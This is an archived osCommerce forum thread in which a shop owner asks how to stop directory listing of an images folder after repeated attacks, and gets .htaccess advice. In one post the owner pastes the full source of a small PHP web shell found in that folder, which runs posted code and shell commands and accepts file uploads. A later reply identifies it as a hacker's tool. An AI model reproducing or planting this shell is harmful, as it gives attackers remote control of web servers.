blondu' Posted July 9, 2010 Posted July 9, 2010 Hello, if access www.mystore.com/images can see all files that are in images folder. Site has been attacked three times in the last month, I did everything I found here - http://www.oscommerce.com/forums/index.php?showtopic=313323 but now I have this problem I can see what is in images. How can I block access to that folder? |Thank you
MrPhil Posted July 9, 2010 Posted July 9, 2010 If the only problem is that random visitors can enter a directory (folder) in the browser, and see all the files in it, you can do one of two things: you can put in a dummy index.html in that directory (empty file or something trivial), or you can set your system to "disable indexing" via a control panel button or adding a Options -Indexes line to .htaccess. Being able to see image files is not a security hazard, but you might not want visitors to see other kinds of files. Remember that anyone can view a page source and get the name and path of any image file, and directly call up that image. Adding "hotlink protection" that allows "empty" (command line) would prevent someone from doing that.
blondu' Posted July 10, 2010 Author Posted July 10, 2010 I fix the problem with .htacces AuthUserFile /dev/null AuthGroupFile /dev/null RewriteEngine On RewriteCond %{HTTP_REFERER} !^http://www.site.com.* [NC] RewriteCond %{HTTP_REFERER} !^http://ma.osite.com.* [NC] RewriteCond %{HTTP_REFERER} !^http://members.site.com.* [NC] RewriteCond %{HTTP_REFERER} !^http://ochesite.com.* [NC] RewriteCond %{HTTP_REFERER} !^http://911.222.111.111.* [NC] RewriteRule /* http://osite.com/index.html [R,L]
blondu' Posted July 10, 2010 Author Posted July 10, 2010 And I have problems with images folder. I found the folder goog1e5b6d6f1840c255.php Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
germ Posted July 11, 2010 Posted July 11, 2010 Looks like something a hacker might use to me. It's not "normal" to have PHP files in your images folder (on most sites). If you were an astronaut I would advise you to "get on the horn" and repeat the infamous words from Apollo 13: "Houston... We have a problem...." :'( If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
Recommended Posts
Archived
This topic is now archived and is closed to further replies.